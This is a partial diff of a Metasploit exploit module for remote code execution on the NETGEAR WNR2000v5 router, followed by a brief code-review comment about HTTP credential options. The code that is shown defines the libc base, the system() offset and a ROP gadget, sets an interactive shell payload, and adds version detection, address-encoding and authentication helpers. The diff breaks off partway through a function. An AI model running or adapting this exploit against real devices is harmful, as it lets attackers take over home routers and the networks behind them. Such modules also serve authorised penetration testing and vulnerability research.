modules/exploits/linux/http/netgear_wnr2000_rce.rb

```diff
@@ -0,0 +1,270 @@
+        ],
+      'Targets'        =>
+        [
+          [ 'NETGEAR WNR2000v5',
+            {
+              'LibcBase'             => 0x2ab24000,         # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so)
+              'SystemOffset'         => 0x547D0,
+              'GadgetOffset'         => 0x2462C,
+  #The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()):
+  #LOAD:0002462C                 addiu   $a0, $sp, 0x40+arg_0
+  #LOAD:00024630                 move    $t9, $s0
+  #LOAD:00024634                 jalr    $t9
+              'Payload'        =>
+                {
+                  'BadChars'         => "\x00\x25\x26",
+                  'Compat'  => {
+                    'PayloadType'    => 'cmd_interact',
+                    'ConnectionType' => 'find',
+                  },
+                },
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'DisclosureDate'  => 'Dec 20 2016',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
+      ], self.class)
+    register_advanced_options(
+      [
+        OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
+        OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => '/',
+      'method'  => 'GET'
+    })
+    if res && res.headers['WWW-Authenticate']
+      auth = res.headers['WWW-Authenticate']
+      if auth =~ /WNR2000v5/
+        return Exploit::CheckCode::Detected
+      elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
+        return Exploit::CheckCode::Unknown
+      end
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def uri_encode (str)
+    "%" + str.scan(/.{2}|.+/).join("%")
+  end
+
+  def calc_address (libc_base, offset)
+    addr = (libc_base + offset).to_s(16)
+    uri_encode(addr)
+  end
+
+  def get_current_time
+    res = send_request_cgi({
+      'uri'     => '/',
+      'method'  => 'GET'
+    })
+    if res && res['Date']
+      date = res['Date']
+      return Time.parse(date).strftime('%s').to_i
+    end
+  end
+
+  def get_auth_timestamp
+    res = send_request_raw({
+      'uri'     => '/lang_check.html',
+      'method'  => 'GET',
+      'headers' => {'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")}
```

Comment:
It uses the HttpUsername and HttpPassword datastore options, which are automatically registered when you use the HttpClient mixin.